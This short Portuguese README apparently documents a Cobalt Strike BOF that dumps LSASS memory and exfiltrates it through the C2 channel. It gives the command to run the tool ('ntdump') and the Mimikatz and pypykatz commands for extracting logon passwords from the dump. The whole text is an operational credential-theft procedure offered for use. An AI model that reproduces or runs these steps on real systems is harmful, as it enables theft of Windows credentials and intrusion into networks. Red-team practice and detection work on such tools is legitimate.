
BOF do Cobalt Strike que cria um minidump do LSASS na memória e o exfiltra através do callback C2 para análise offline de credenciais com Mimikatz ou pypykatz.
Porta BOF da ferramenta https://github.com/ricardojoserf/NativeDump escrita por @ricardojoserf.
Importe o NtDump.cna e execute:
ntdump <filename>
O arquivo minidump será criado na memória e baixado usando CALLBACK_FILE e CALLBACK_FILE_WRITE. Após o download, o arquivo ficará visível em View -> Download.
Isso pode posteriormente ser analisado usando o Mimikatz
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
Ou o pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>